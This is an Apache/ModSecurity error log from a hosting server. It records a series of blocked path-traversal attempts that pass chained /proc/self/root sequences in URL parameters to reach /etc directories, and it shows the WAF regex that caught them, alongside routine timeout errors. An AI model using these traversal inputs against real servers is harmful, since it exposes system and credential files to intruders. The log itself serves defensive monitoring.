[Thu Mar 19 14:18:12.120320 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:56864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwv1Mdf6f5d65gmYZSUHAAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:18:17.567276 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:46122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwv2eoXxyEfFpUF8f8mvAAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:18:23.146144 2026] [proxy_fcgi:error] [pid 8307:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:41494] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:18:50.132803 2026] [proxy_fcgi:error] [pid 27293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42112] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:19:17.125786 2026] [proxy_fcgi:error] [pid 7235:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42682] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:19:20.760580 2026] [:error] [pid 7545:tid 140411590858496] [client 74.7.243.128:42910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwwGH8B84UptSoTJtYoiQAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:19:43.313937 2026] [mime_magic:error] [pid 7893:tid 140411666392832] (70014)End of file found: [client 57.141.18.93:45880] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:19:45.116506 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43336] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:20:11.125801 2026] [proxy_fcgi:error] [pid 7235:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44070] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:20:36.069830 2026] [proxy_fcgi:error] [pid 19093:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44692] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:20:38.958937 2026] [mime_magic:error] [pid 17653:tid 140411666392832] (70014)End of file found: [client 57.141.18.64:47144] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:20:40.391241 2026] [mime_magic:error] [pid 26799:tid 140411699963648] (70014)End of file found: [client 57.141.18.89:47296] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:20:51.483255 2026] [mime_magic:error] [pid 30077:tid 140411574073088] (70014)End of file found: [client 57.141.18.46:47540] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:20:54.595230 2026] [mime_magic:error] [pid 7235:tid 140411607643904] (70014)End of file found: [client 74.7.241.31:46568] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib
[Thu Mar 19 14:20:54.595659 2026] [access_compat:error] [pid 7235:tid 140411607643904] [client 74.7.241.31:46568] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib
[Thu Mar 19 14:20:59.125791 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:45254] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:21:11.551772 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:52680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwwhwkwaGbbGflqUZDjqAAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:21:18.615866 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.243.128:54070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwwjhCii7xarUs8iHYDNQAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:21:19.301918 2026] [mime_magic:error] [pid 17653:tid 140411666392832] (70014)End of file found: [client 57.141.18.43:48054] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:21:21.129834 2026] [proxy_fcgi:error] [pid 19093:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45756] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:21:34.540834 2026] [:error] [pid 7545:tid 140411699963648] [client 74.7.243.128:42162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwwnn8B84UptSoTJtYo3wAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:21:44.122342 2026] [proxy_fcgi:error] [pid 7545:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:46312] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:21:59.776770 2026] [mime_magic:error] [pid 17653:tid 140411733534464] (70014)End of file found: [client 57.141.18.30:49150] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:22:08.069859 2026] [proxy_fcgi:error] [pid 7893:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46940] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:22:32.069785 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47514] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:22:35.585654 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.228.61:54532] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abww28df6f5d65gmYZSUmQAAAtA"]
[Thu Mar 19 14:22:43.539937 2026] [core:alert] [pid 17887:tid 140411733534464] [client 57.141.18.41:50210] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:22:53.125831 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48000] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:22:54.359753 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.244.43:60508] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abww7gbLMZ6AikZjR9V4LwAAABM"]
[Thu Mar 19 14:23:19.127977 2026] [proxy_fcgi:error] [pid 8307:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48678] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:23:36.671914 2026] [core:alert] [pid 7235:tid 140411649607424] [client 57.141.18.58:51316] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:23:47.123617 2026] [proxy_fcgi:error] [pid 7235:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:49364] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:24:08.772474 2026] [mime_magic:error] [pid 27293:tid 140411674785536] (70014)End of file found: [client 57.141.18.100:51606] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:24:18.153782 2026] [proxy_fcgi:error] [pid 7545:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:50226] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:24:48.057905 2026] [proxy_fcgi:error] [pid 7545:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:50982] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:25:14.119884 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51650] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:25:45.081829 2026] [proxy_fcgi:error] [pid 7235:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52244] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:26:10.133872 2026] [proxy_fcgi:error] [pid 7235:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52840] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:26:33.553777 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53362] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:26:55.097848 2026] [proxy_fcgi:error] [pid 7893:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53884] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:27:17.349425 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:50656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwx9RCii7xarUs8iHYEJQAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:18.173813 2026] [proxy_fcgi:error] [pid 7893:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54454] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:27:18.287663 2026] [:error] [pid 27293:tid 140411674785536] [client 74.7.243.128:39746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwx9v-YZRR_7pZ7nDKmXgAAA8g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:27:20.065284 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.241.31:51446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwx-P-YZRR_7pZ7nDKmXwAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:22.194470 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:51448] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwx-sdf6f5d65gmYZSVBwAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:24.048726 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:51458] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwx_AkwaGbbGflqUZDkVgAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:25.899512 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:51460] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwx_fu8EFLIOrSqIpvDogAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:28.060799 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:33146] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyAMdf6f5d65gmYZSVEwAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:28.264824 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:33146] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyAMdf6f5d65gmYZSVFAAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:32.256377 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:33160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyBAkwaGbbGflqUZDkXgAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:35.350339 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.241.31:33162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 